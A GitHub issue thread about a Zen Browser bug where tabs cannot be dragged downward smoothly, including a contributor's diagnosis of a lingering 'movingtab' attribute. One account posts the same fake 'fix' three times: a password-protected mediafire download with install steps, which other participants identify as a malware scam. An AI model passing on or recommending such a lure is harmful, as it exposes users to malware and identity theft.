### ISSUE TITLE
Moving a tab down bug

### ISSUE THREAD

**Issue by abdo0nasser** [zen-browser/desktop#1120]
### What happened?

I can't move the place of any tab up but I can't do the same down
moving it down requires me to select it and move the cursor all the way down and then it goes only to the last tap place 

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0

### Severity impact

Low

### What platform are you seeing the problem on?

Linux

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Abdo865** [comment]
you think that I'm an idiot?

**Comment by sjclayton** [comment]
@Abdo865 It's getting to the point where Github is going to need a 'Report' option in the drop-down menu on comments.... 😦

Too much of this B.S. happening lately.

**Comment by Abdo865** [comment]
@sjclayton I hope people who don't know those type of scams don't download any of these because they don't know what this may do

**Comment by sjclayton** [comment]
> @sjclayton I hope people who don't know those type of scams don't download any of these because they don't know what this may do

Yeah, at the very least they'll end up with viruses or malware, and at the very worst ransomware / identity theft.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mauro-balades** [comment]
Could you provide a video?

**Comment by abdo0nasser** [comment]
the problem is with moving tabs down not smooth as moving them up like what is in the video

https://github.com/user-attachments/assets/e7e12482-9d9e-4b76-9563-4aa8ed4bd063

**Comment by vileflume** [comment]
so i ran into a similar issue and i figured i'd share here instead of opening a new one. 

moving a tab adds the attribute `movingtab=""` to the element `<toolbox id="navigator-toolbox">`

for some reason, the attribute persists after releasing the tab unless it was dropped at the bottom of the list. if i move to any position other than last, the flag stays there and i cannot select or move the tab again (until i grab a different tab and move it to the end). Hitting esc while moving a tab freezes the move and the tab hovers in place when the correct action would be to abort the move entirely

**Comment by LeMoonStar** [comment]
Testing in the current Zen version 1.0.1-a.17 I cannot reproduce this issue. As this issue has been stale for quite a while, it seems safe to assume it has been fixed.
If the issue still persist, please comment or re-open this issue.
